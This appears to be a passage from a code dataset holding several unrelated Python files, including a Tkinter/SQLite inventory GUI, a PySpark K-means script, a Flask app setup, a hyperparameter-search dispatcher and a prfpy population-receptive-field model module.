'both', side = 'right')\n\n Label(self.mainarea_boots, text=\"Boot name\").pack()\n\n self._storeVar = StringVar()\n self._tablename = \"boots\"\n\n # adding the Entry (text-field) on frame\n # adding the button on the text field\n # command attribute in button will execute the method or command\n Entry(self.mainarea_boots, textvariable=self._storeVar, width=30).pack()\n\n Button(self.mainarea_boots, text=\"Enter\",width=27, command=self._enter_data).pack()\n\n self.root.mainloop()\n\n \"\"\"\n This method call when the button the side-bar is clicked\n This method get the values from the \"Entry\" widget and\n insert in the database\n \"\"\"\n def _enter_data(self):\n storeVar = self._storeVar.get()\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n cursor.execute('insert into %s (name) values (?)'%self._tablename, (storeVar,))\n db.commit()\n \"\"\"\n select data from the database and show them\n on the console.\n \"\"\"\n for row in cursor.execute('SELECT * FROM %s'%self._tablename):\n print (row)\n db.close()\n\n\n\ndef setup_database():\n\n # checking the database file is exist\n # if the file is exist\n # remove the existing data and create the new database\n if os.path.isfile(\"database_filename\"):\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n # Delete any existing data\n cursor.execute('DROP TABLE IF EXISTS tshirts')\n cursor.execute('DROP TABLE IF EXISTS posters')\n cursor.execute('DROP TABLE IF EXISTS boots')\n\n print (\"Existing Data are deleted\")\n\n else:\n db = sqlite3.connect(\"database_filename\")\n cursor = db.cursor()\n print (\"New Database is created\")\n\n # Create a database table\n # add the id as integer primary so it will relate to the unique\n # identification\n cursor.execute('''CREATE TABLE tshirts\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n cursor.execute('''CREATE TABLE posters\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n cursor.execute('''CREATE TABLE boots\n (id INTEGER PRIMARY KEY ASC AUTOINCREMENT,\n name TEXT NOT NULL\n );''');\n\n db.commit()\n db.close()\n print (\"Tables are created\")\n\n\ndef start_gui():\n\n MenuGUI().mainloop()\n\n\ndef quit():\n\n sys.exit()\n\n\ndef main():\n 
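# entry point: (re)create the SQLite tables first, then launch the Tkinter interface\n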
setup_database()\n start_gui()\n\n\nif __name__ == '__main__':\n main()","sub_path":"gui_main.py","file_name":"gui_main.py","file_ext":"py","file_size_in_byte":7532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"42066521","text":"# Project Living Index - Dhivya Sivaramakrishnan, Mangesh Bhangare\n\nfrom pyspark import SparkConf, SparkContext\nfrom pyspark.sql import SQLContext, DataFrame, Row\nfrom pyspark.mllib.clustering import KMeans, KMeansModel\nfrom numpy import array\nfrom math import sqrt\n\nimport sys\n\nconf = SparkConf().setAppName('K-Means test')\nsc = SparkContext(conf=conf)\nassert sc.version >= '1.5.1'\nsqlContext = SQLContext(sc)\n\ninput_living_index = sys.argv[1]\n\n# Read the parquet data and convert to RDD\nparquet_living_index = sqlContext.read.parquet(input_living_index)\nparquet_living_index.registerTempTable(\"living_index_table\")\nliving_index_table = sqlContext.sql(\"SELECT * FROM living_index_table\")\nliving_index_rdd = living_index_table.map(lambda colName: (str(colName.Community_Code) + \",\" + str(colName.Crime_Frequency)\n + \",\" + str(colName.Housing_Crowded) + \",\" + str(colName.Household_BPL)\n + \",\" + str(colName.Unemployed) + \",\" + str(colName.Without_Diploma)\n + \",\" + str(colName.Age_Bar) + \",\" + str(colName.Per_Capita_Income)\n + \",\" + str(colName.Hardship_Index)))\n\n# K-means does multiple runs to find the optimal cluster center, so cache the input to K-means\ncluster_input = living_index_rdd.map(lambda line: array([float(x) for x in line.split(',')])).cache()\n\n# Perform K-means clustering\nclusters = KMeans.train(cluster_input, 20, maxIterations=5,\n runs=5, initializationMode=\"random\")\n\n# Compute squared error and change cluster centers\ndef squared_error(point):\n center = clusters.centers[clusters.predict(point)]\n return sqrt(sum([x**2 for x in (point - center)]))\n\nerror = cluster_input.map(lambda point: squared_error(point)).reduce(lambda x, y: x + y)\nprint(\"Squared error for a cluster = \" + str(error))\n\n# Save the cluster model\nclusters.save(sc, \"myModel/living-index\")\nsameModel = KMeansModel.load(sc, \"myModel/living-index\")\n","sub_path":"kmeans-living_index.py","file_name":"kmeans-living_index.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"555600000","text":"\nfrom datetime import datetime\n\nimport pytz\nfrom flask import Flask\n\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import CSRFProtect\nfrom flask_login import LoginManager\n\ndb = SQLAlchemy()\ncsrf = CSRFProtect()\nlogin_manager = LoginManager()\n\n\ndef create_app(config: str) -> Flask:\n app = Flask(__name__, static_folder='assets/static')\n app.config.from_pyfile(str(config))\n\n db.init_app(app)\n csrf.init_app(app)\n login_manager.init_app(app)\n\n init_blueprints(app)\n init_jinja_env(app)\n init_hooks(app)\n init_login(app)\n\n return app\n\n\ndef init_blueprints(app: Flask):\n from . import views\n app.register_blueprint(views.main)\n app.register_blueprint(views.userbp)\n app.register_blueprint(views.api, url_prefix='/api/v1')\n\n app.errorhandler(404)(views.errors.page_not_found)\n\n\ndef init_jinja_env(app: Flask):\n from . 
import utils\n app.jinja_env.filters['pretty_size'] = utils.pretty_size\n app.jinja_env.filters['cdatasafe'] = utils.cdatasafe\n app.jinja_env.filters['bootstrap_alert'] = utils.bootstrap_alert\n app.jinja_env.globals['url_for_other_page'] = utils.url_for_other_page\n app.jinja_env.globals['now'] = datetime.now(pytz.utc)\n app.jinja_env.finalize = lambda val: '' if val is None else val\n\n\ndef init_hooks(app: Flask):\n from . import utils\n app.before_request(utils.inject_search_data)\n\n\ndef init_login(app: Flask):\n from . import models\n\n @login_manager.user_loader\n def user_loader(user_id):\n return models.User.query.filter_by(id=int(user_id)).first()\n","sub_path":"pynyaa/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"382452379","text":"# -*- coding:utf-8 -*-\n\nimport time\n\nimport pandas as pd\nfrom IPython.display import display, update_display, display_markdown\n\nfrom ..core.callbacks import EarlyStoppingError\nfrom ..core.dispatcher import Dispatcher\nfrom ..core.trial import Trial\nfrom ..utils import logging, fs\nfrom ..utils.common import config, isnotebook\n\nlogger = logging.get_logger(__name__)\n\n_is_notebook = isnotebook()\n_model_root = config('model_path', 'tmp/models')\n\n\nclass InProcessDispatcher(Dispatcher):\n def __init__(self, models_dir):\n super(InProcessDispatcher, self).__init__()\n\n self.models_dir = models_dir\n fs.makedirs(models_dir, exist_ok=True)\n\n def dispatch(self, hyper_model, X, y, X_eval, y_eval, cv, num_folds, max_trials, dataset_id, trial_store,\n **fit_kwargs):\n retry_limit = int(config('search_retry', '1000'))\n\n trial_no = 1\n retry_counter = 0\n current_trial_display_id = None\n search_summary_display_id = None\n best_trial_display_id = None\n title_display_id = None\n start_time = time.time()\n last_reward = 0\n while trial_no <= max_trials:\n space_sample = hyper_model.searcher.sample()\n if hyper_model.history.is_existed(space_sample):\n if retry_counter >= retry_limit:\n logger.info(f'Unable to take valid sample and exceed the retry limit {retry_limit}.')\n break\n trial = hyper_model.history.get_trial(space_sample)\n for callback in hyper_model.callbacks:\n callback.on_skip_trial(hyper_model, space_sample, trial_no, 'trial_existed', trial.reward, False,\n trial.elapsed)\n retry_counter += 1\n continue\n\n try:\n if trial_store is not None:\n trial = trial_store.get(dataset_id, space_sample)\n if trial is not None:\n reward = trial.reward\n elapsed = trial.elapsed\n trial = Trial(space_sample, trial_no, reward, elapsed)\n improved = hyper_model.history.append(trial)\n hyper_model.searcher.update_result(space_sample, reward)\n for callback in hyper_model.callbacks:\n callback.on_skip_trial(hyper_model, space_sample, trial_no, 'hit_trial_store', reward,\n improved,\n elapsed)\n trial_no += 1\n continue\n\n for callback in hyper_model.callbacks:\n # callback.on_build_estimator(hyper_model, space_sample, estimator, trial_no) #fixme\n callback.on_trial_begin(hyper_model, space_sample, trial_no)\n\n model_file = '%s/%05d_%s.pkl' % (self.models_dir, trial_no, space_sample.space_id)\n\n if _is_notebook:\n df_summary = pd.DataFrame([(trial_no, last_reward, hyper_model.best_trial_no,\n hyper_model.best_reward,\n time.time() - start_time, max_trials)],\n columns=['trial No.', 'Previous reward', 'Best trial', 'Best reward',\n 'Total elapsed',\n 'Max trials'])\n if search_summary_display_id is None:\n 
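# first notebook render of the summary table: create a display handle once; later trials refresh the same cell in place via update_display\n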
handle = display(df_summary, display_id=True)\n if handle is not None:\n search_summary_display_id = handle.display_id\n else:\n update_display(df_summary, display_id=search_summary_display_id)\n\n if current_trial_display_id is None:\n handle = display({'text/markdown': '#### Current Trial:'}, raw=True, include=['text/markdown'],\n display_id=True)\n if handle is not None:\n title_display_id = handle.display_id\n handle = display(space_sample, display_id=True)\n if handle is not None:\n current_trial_display_id = handle.display_id\n else:\n update_display(space_sample, display_id=current_trial_display_id)\n\n trial = hyper_model._run_trial(space_sample, trial_no, X, y, X_eval, y_eval, cv, num_folds, model_file,\n **fit_kwargs)\n last_reward = trial.reward\n if trial.reward != 0: # success\n improved = hyper_model.history.append(trial)\n for callback in hyper_model.callbacks:\n callback.on_trial_end(hyper_model, space_sample, trial_no, trial.reward,\n improved, trial.elapsed)\n else:\n for callback in hyper_model.callbacks:\n callback.on_trial_error(hyper_model, space_sample, trial_no)\n\n if _is_notebook:\n best_trial = hyper_model.get_best_trial()\n if best_trial is not None:\n if best_trial_display_id is None:\n display_markdown('#### Best Trial:', raw=True)\n handle = display(best_trial.space_sample, display_id=True)\n if handle is not None:\n best_trial_display_id = handle.display_id\n else:\n update_display(best_trial.space_sample, display_id=best_trial_display_id)\n\n if logger.is_info_enabled():\n msg = f'Trial {trial_no} done, reward: {trial.reward}, ' \\\n f'best_trial_no:{hyper_model.best_trial_no}, best_reward:{hyper_model.best_reward}\\n'\n logger.info(msg)\n if trial_store is not None:\n trial_store.put(dataset_id, trial)\n except EarlyStoppingError:\n break\n # TODO: early stopping\n except Exception as e:\n import sys\n import traceback\n msg = f'{\">\" * 20} Trial {trial_no} failed! 
{\"<\" * 20}\\n' \\\n + f'{e.__class__.__name__}: {e}\\n' \\\n + traceback.format_exc() \\\n + '*' * 50\n logger.error(msg)\n finally:\n trial_no += 1\n retry_counter = 0\n\n if _is_notebook:\n update_display({'text/markdown': '#### Top trials:'}, raw=True, include=['text/markdown'],\n display_id=title_display_id)\n df_best_trials = pd.DataFrame([\n (t.trial_no, t.reward, t.elapsed, t.space_sample.vectors) for t in hyper_model.get_top_trials(5)],\n columns=['Trial No.', 'Reward', 'Elapsed', 'Space Vector'])\n if current_trial_display_id is None:\n display(df_best_trials, display_id=True)\n else:\n update_display(df_best_trials, display_id=current_trial_display_id)\n\n return trial_no\n","sub_path":"hypernets/dispatchers/in_process_dispatcher.py","file_name":"in_process_dispatcher.py","file_ext":"py","file_size_in_byte":7498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"282333309","text":"def readInput():\n line1 = input()\n line2 = input()\n line3 = input()\n #把字串轉成整數 , 才能做後續的運算\n num1 = int(line1)\n num2 = int(line2)\n num3 = int(line3)\n\n print(num1+1)\n print(num2+1)\n print(num3+1)\n\n#readInput()\n#numbers.py < 1.txt\n# 1.txt:\n# 10\n# 20\n# 30\n\ndef readInput1():\n line = input()\n cnt = int(line)\n for i in range(0,cnt):\n line = input()\n num = int(line)\n print(num+1)\n\n#numbers.py < num.txt\n\nreadInput1()","sub_path":"2_io/numbers.py","file_name":"numbers.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"572218002","text":"#Author:Sun Jian\nimport xadmin\nfrom .models import CourseOrg,CityDict,Teacher\n\nclass CourseOrgAdmin(object):\n list_display = ['name', 'desc','category', 'click_num', 'fav_num','add_time' ]\n search_fields = ['name', 'desc','category', 'click_num', 'fav_num']\n list_filter = ['name', 'desc', 'category', 'click_num', 'fav_num','city__name','address','add_time']\n # relfield_style = 'fk-ajax'\n\n\nclass CityDictAdmin(object):\n list_display = ['name', 'desc', 'add_time']\n search_fields = ['name', 'desc']\n list_filter = ['name', 'desc', 'add_time']\n\n\nclass TeacherAdmin(object):\n list_display = ['name', 'org', 'work_years', 'work_company','add_time']\n search_fields = ['org', 'name', 'work_years', 'work_company']\n list_filter = ['org__name', 'name', 'work_years', 'work_company','click_num', 'fav_num', 'add_time']\n\n\n\n\nxadmin.site.register(CourseOrg,CourseOrgAdmin)\nxadmin.site.register(CityDict,CityDictAdmin)\nxadmin.site.register(Teacher,TeacherAdmin)\n","sub_path":"apps/organization/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"448010541","text":"import sys\n\n# Opening files\ninputPath = sys.argv[1]\ninputFile = open(inputPath,'r')\noutputPath = sys.argv[2]\noutputFile = open(outputPath, \"w+\")\n\nfor line in inputFile:\n if line != \"\\n\":\n outputFile.write(line)\n\t\t\t\n\ninputFile.close()\noutputFile.close()","sub_path":"src/removeBlankLines.py","file_name":"removeBlankLines.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"84197201","text":"import numpy as np\nimport scipy.signal as signal\nfrom nilearn.glm.first_level.hemodynamic_models import spm_hrf, spm_time_derivative, spm_dispersion_derivative\nfrom .rf import gauss2D_iso_cart # import required 
RF shapes\nfrom .timecourse import stimulus_through_prf, \\\n convolve_stimulus_dm, \\\n generate_random_cosine_drifts, \\\n generate_arima_noise, \\\n filter_predictions\n\n\nclass Model(object):\n \"\"\"Model\n\n Class that takes care of generating grids for pRF fitting and simulations\n \"\"\"\n\n def __init__(self, stimulus):\n \"\"\"__init__\n\n constructor for Model, takes stimulus object as argument\n\n Parameters\n ----------\n stimulus : PRFStimulus2D or PRFStimulusDD\n Stimulus object containing information about the stimulus,\n and the space in which it lives.\n\n \"\"\"\n self.stimulus = stimulus\n\n def create_hrf(self, hrf_params=[1.0, 1.0, 0.0]):\n \"\"\"\n \n construct single or multiple HRFs \n\n Parameters\n ----------\n hrf_params : TYPE, optional\n DESCRIPTION. The default is [1.0, 1.0, 0.0].\n\n Returns\n -------\n TYPE\n DESCRIPTION.\n\n \"\"\"\n \n hrf = np.array(\n [\n np.ones_like(hrf_params[1])*hrf_params[0] *\n spm_hrf(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis],\n hrf_params[1] *\n spm_time_derivative(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis],\n hrf_params[2] *\n spm_dispersion_derivative(\n tr=self.stimulus.TR,\n oversampling=1,\n time_length=40)[...,np.newaxis]]).sum(\n axis=0) \n\n return hrf.T\n \n def convolve_timecourse_hrf(self, tc, hrf):\n \"\"\"\n \n Convolve neural timecourses with single or multiple hrfs.\n\n Parameters\n ----------\n tc : ndarray, 1D or 2D\n The timecourse(s) to be convolved.\n hrf : ndarray, 1D or 2D\n The HRF. Can be single, or a different one for each timecourse.\n\n Returns\n -------\n convolved_tc : ndarray\n Convolved timecourse.\n\n \"\"\"\n #scipy fftconvolve does not have padding options so doing it manually\n pad_length = 20\n pad = np.tile(tc[:,0], (pad_length,1)).T\n padded_tc = np.hstack((pad,tc))\n \n \n if hrf.shape[0]>1: \n assert hrf.shape[0] == tc.shape[0], f\"{hrf.shape[0]} HRFs provided vs {tc.shape[0]} timecourses\"\n median_hrf = np.median(hrf, axis=0).reshape(1,-1)\n if np.all([np.allclose(median_hrf, single_hrf.reshape(1,-1)) for single_hrf in hrf]): \n \n convolved_tc = signal.fftconvolve(padded_tc, median_hrf, axes=(-1))[..., pad_length:tc.shape[-1]+pad_length]\n \n else: \n convolved_tc = np.zeros_like(tc)\n \n for n_ in range(hrf.shape[0]):\n convolved_tc[n_,:] = signal.fftconvolve(padded_tc[n_,:],hrf[n_,:])[..., pad_length:tc.shape[-1]+pad_length] \n \n else:\n convolved_tc = signal.fftconvolve(padded_tc, hrf, axes=(-1))[..., pad_length:tc.shape[-1]+pad_length] \n\n return convolved_tc\n\n def create_drifts_and_noise(self,\n drift_ranges=[[0, 0]],\n noise_ar=None,\n noise_ma=(1, 0.0),\n noise_amplitude=1.0):\n \"\"\"add_drifs_and_noise\n\n creates noise and drifts of size equal to the predictions\n\n Parameters\n ----------\n drift_ranges : list of 2-lists of floats, optional\n specifies the lower- and upper bounds of the ranges\n of each of the discrete cosine low-pass components\n to be generated\n noise_ar : 2x2 list.\n argument passed to timecourse.generate_arima_noise\n (the default is None, for no noise)\n noise_amplitude : float, optional\n\n \"\"\"\n assert hasattr(\n self, 'predictions'), \"please first create the grid to which to add noise\"\n self.random_drifts = generate_random_cosine_drifts(\n dimensions=self.predictions.shape, amplitude_ranges=drift_ranges)\n if noise_ar is not None:\n self.random_noise = generate_arima_noise(\n ar=noise_ar, ma=noise_ma, dimensions=self.predictions.shape) * noise_amplitude\n else:\n 
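# no ARIMA parameters were given, so fall back to a noise-free (all-zero) array with the same shape as the predictions\n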
self.random_noise = np.zeros_like(self.predictions)\n\n\nclass Iso2DGaussianModel(Model):\n \"\"\"Iso2DGaussianModel\n To extend please create a setup_XXX_grid function for any new way of\n defining grids.\n \"\"\"\n\n def __init__(self,\n stimulus,\n hrf=None,\n filter_predictions=False,\n filter_type='dc',\n filter_params={},\n normalize_RFs=False,\n **kwargs):\n \"\"\"__init__ for Iso2DGaussianModel\n\n constructor, sets up stimulus and hrf for this Model\n\n Parameters\n ----------\n stimulus : PRFStimulus2D\n Stimulus object specifying the information about the stimulus,\n and the space in which it lives.\n hrf : string, list or numpy.ndarray, optional\n HRF shape for this Model.\n Can be 'direct', which implements nothing (for eCoG or later convolution),\n a list or array of 3, which are multiplied with the three spm HRF basis functions,\n and an array already sampled on the TR by the user.\n (the default is None, which implements standard spm HRF)\n filter_predictions : boolean, optional\n whether to high-pass filter the predictions, default False\n filter_params : see timecourse.py\n \"\"\"\n super().__init__(stimulus)\n self.__dict__.update(kwargs)\n\n # HRF stuff\n if hrf is None: # for use with standard fMRI\n self.hrf = self.create_hrf()\n elif hrf == 'direct': # for use with anything like eCoG with instantaneous irf\n self.hrf = np.array([1])\n # some specific hrf with spm basis set\n elif ((isinstance(hrf, list)) or (isinstance(hrf, np.ndarray))) and len(hrf) == 3:\n self.hrf = self.create_hrf(hrf_params=hrf)\n # some specific hrf already defined at the TR (!)\n elif isinstance(hrf, np.ndarray) and len(hrf) > 3:\n self.hrf = hrf\n\n self.stimulus.convolved_design_matrix = convolve_stimulus_dm(\n stimulus.design_matrix, hrf=self.hrf)\n\n # filtering and other stuff\n self.filter_predictions = filter_predictions\n self.filter_type = filter_type\n \n #settings for filter\n self.filter_params = filter_params\n \n #adding stimulus parameters\n self.filter_params['task_lengths'] = self.stimulus.task_lengths\n self.filter_params['task_names'] = self.stimulus.task_names\n self.filter_params['late_iso_dict'] = self.stimulus.late_iso_dict\n \n #normalizing RFs to have volume 1\n self.normalize_RFs = normalize_RFs\n \n\n def create_rfs(self):\n \"\"\"create_rfs\n\n creates rfs for the grid\n\n \"\"\"\n assert hasattr(self, 'xs'), \"please set up the grid first\"\n self.grid_rfs = np.rot90(gauss2D_iso_cart(\n x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=np.array([self.xs.ravel(), self.ys.ravel()]),\n sigma=self.sizes.ravel(),\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n def stimulus_times_prfs(self):\n \"\"\"stimulus_times_prfs\n\n creates timecourses for each of the rfs in self.grid_rfs\n\n \"\"\"\n assert hasattr(self, 'grid_rfs'), \"please create the rfs first\"\n self.predictions = stimulus_through_prf(\n self.grid_rfs, self.stimulus.convolved_design_matrix)\n\n\n def create_grid_predictions(self,\n ecc_grid,\n polar_grid,\n size_grid):\n \"\"\"create_predictions\n\n creates predictions for a given set of parameters\n\n [description]\n\n Parameters\n ----------\n ecc_grid : list\n to be filled in by user\n polar_grid : list\n to be filled in by user\n size_grid : list\n to be filled in by user\n \"\"\"\n assert ecc_grid is not None and polar_grid is not None and size_grid is not None, \\\n \"please fill in all spatial grids\"\n\n self.eccs, self.polars, self.sizes = np.meshgrid(\n ecc_grid, polar_grid, size_grid)\n 
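# convert the polar grid (eccentricity, angle) to Cartesian pRF centres: x = ecc * cos(angle), y = ecc * sin(angle)\n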
self.xs, self.ys = np.cos(self.polars) * \\\n self.eccs, np.sin(self.polars) * self.eccs\n\n self.create_rfs()\n self.stimulus_times_prfs()\n\n if self.filter_predictions:\n self.predictions = filter_predictions(\n self.predictions,\n self.filter_type,\n self.filter_params)\n self.filtered_predictions = True\n else:\n self.filtered_predictions = False\n\n def return_prediction(self,\n mu_x,\n mu_y,\n size,\n beta,\n baseline,\n hrf_1=None,\n hrf_2=None):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n size : float\n size of pRF\n beta : float\n amplitude of pRF\n baseline : float\n baseline of pRF\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the single rf\n rf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n neural_tc = stimulus_through_prf(rf, dm)\n\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n \n\n if not self.filter_predictions:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * tc\n else:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\nclass CSS_Iso2DGaussianModel(Iso2DGaussianModel):\n\n def return_prediction(self,\n mu_x,\n mu_y,\n size,\n beta,\n baseline,\n n,\n hrf_1=None,\n hrf_2=None):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n size : float\n size of pRF\n beta : float, optional\n amplitude of pRF (the default is 1)\n baseline : float, optional\n baseline of pRF (the default is 0)\n n : float, optional\n exponent of pRF (the default is 1, which is a linear Gaussian)\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the single rf\n rf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n neural_tc = stimulus_through_prf(rf, dm)**n[..., np.newaxis]\n \n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n\n if not self.filter_predictions:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * tc\n else:\n return baseline[..., np.newaxis] + beta[..., np.newaxis] * filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\nclass Norm_Iso2DGaussianModel(Iso2DGaussianModel):\n \"\"\"Norm_Iso2DGaussianModel\n\n Redefining class for normalization model\n\n \"\"\"\n\n def create_grid_predictions(self,\n gaussian_params,\n n_predictions,\n n_timepoints,\n sa,\n ss,\n nb,\n sb):\n \"\"\"create_predictions\n\n creates predictions for a given set of parameters\n\n 
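Every grid node shares the Gaussian position and size given in gaussian_params and differs only in its (sa, ss, nb, sb) values; one prediction timecourse is generated per node.\n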
[description]\n\n Parameters\n ----------\n gaussian_params: array size (3), containing prf position and size.\n n_predictions, n_timepoints: self explanatory, obtained from fitter\n nb,sa,ss,sb: meshgrid, created in fitter.grid_fit\n\n \"\"\"\n\n predictions = np.zeros((n_predictions, n_timepoints), dtype='float32') \n \n for idx in range(n_predictions):\n prediction_params = np.array([gaussian_params[0],\n gaussian_params[1],\n gaussian_params[2],\n 1.0,\n 0.0,\n sa[idx],\n ss[idx],\n nb[idx],\n sb[idx]]).T\n predictions[idx,\n :] = self.return_prediction(*list(prediction_params)).astype('float32')\n\n return predictions\n\n def return_prediction(self,\n mu_x,\n mu_y,\n prf_size,\n prf_amplitude,\n bold_baseline,\n srf_amplitude,\n srf_size,\n neural_baseline,\n surround_baseline,\n hrf_1=None,\n hrf_2=None\n ):\n \"\"\"return_prediction [summary]\n\n returns the prediction for a single set of parameters.\n\n Parameters\n ----------\n mu_x : [type]\n [description]\n mu_y : [type]\n [description]\n prf_size : [type]\n [description]\n prf_amplitude : [type]\n [description]\n bold_baseline : [type]\n [description]\n neural_baseline : [type]\n [description]\n srf_amplitude : [type]\n [description]\n srf_size : [type]\n [description]\n surround_baseline : [type]\n [description]\n\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n\n # create the rfs\n\n prf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=prf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n # surround receptive field (denominator)\n srf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=srf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n\n # create normalization model timecourse\n neural_tc = (prf_amplitude[..., np.newaxis] * stimulus_through_prf(prf, dm) + neural_baseline[..., np.newaxis]) /\\\n (srf_amplitude[..., np.newaxis] * stimulus_through_prf(srf, dm) + surround_baseline[..., np.newaxis]) \\\n - neural_baseline[..., np.newaxis]/surround_baseline[..., np.newaxis]\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n \n if not self.filter_predictions:\n return bold_baseline[..., np.newaxis] + tc\n else:\n return bold_baseline[..., np.newaxis] + filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n\n\n\nclass DoG_Iso2DGaussianModel(Iso2DGaussianModel):\n \"\"\"redefining class for difference of Gaussians in iterative fit.\n \"\"\"\n\n def return_prediction(self,\n mu_x,\n mu_y,\n prf_size,\n prf_amplitude,\n bold_baseline,\n\n srf_amplitude,\n srf_size,\n hrf_1=None,\n hrf_2=None\n ):\n \"\"\"return_prediction\n\n returns the prediction for a single set of parameters.\n As this is to be used during iterative search, it also\n has arguments beta and baseline.\n\n Parameters\n ----------\n mu_x : float\n x-position of pRF\n mu_y : float\n y-position of pRF\n prf_size : float\n size of pRF\n\n\n Returns\n -------\n numpy.ndarray\n single prediction given the model\n \"\"\"\n if hrf_1 is None or hrf_2 is None:\n current_hrf = self.hrf\n else:\n current_hrf = self.create_hrf([1.0, hrf_1, hrf_2])\n # create the rfs\n prf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., 
np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=prf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n # surround receptive field\n srf = np.rot90(gauss2D_iso_cart(x=self.stimulus.x_coordinates[..., np.newaxis],\n y=self.stimulus.y_coordinates[..., np.newaxis],\n mu=(mu_x, mu_y),\n sigma=srf_size,\n normalize_RFs=self.normalize_RFs).T, axes=(1,2))\n\n dm = self.stimulus.design_matrix\n\n neural_tc = prf_amplitude[..., np.newaxis] * stimulus_through_prf(prf, dm) - \\\n srf_amplitude[..., np.newaxis] * stimulus_through_prf(srf, dm)\n\n tc = self.convolve_timecourse_hrf(neural_tc, current_hrf)\n\n if not self.filter_predictions:\n return bold_baseline[..., np.newaxis] + tc\n else:\n return bold_baseline[..., np.newaxis] + filter_predictions(\n tc,\n self.filter_type,\n self.filter_params)\n","sub_path":"mri_analysis/model/prfpy/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":20783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"369826469","text":"# -*- coding:utf-8 -*-\n# @Desc: \n# @Author: Administrator\n# @Date: 2018-04-29 12:09\n\n### 练习:九九乘法表\nx = 1 # 控制行数\nwhile x <= 9:\n y = 1 # 控制行的列数\n while y <= x:\n # print(str(y) + \"*\" + str(x) + \"=\" + str(y*x),end = \" \")\n print(\"%d*%d=%d\\t\"%(y,x,x*y),end = \"\")\n y += 1\n print()\n x += 1\n\n\n\n\n","sub_path":"01.PythonDoc/02.控制流程语句/04.while循环的嵌套使用二.py","file_name":"04.while循环的嵌套使用二.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272783305","text":"\n\nimport numpy as 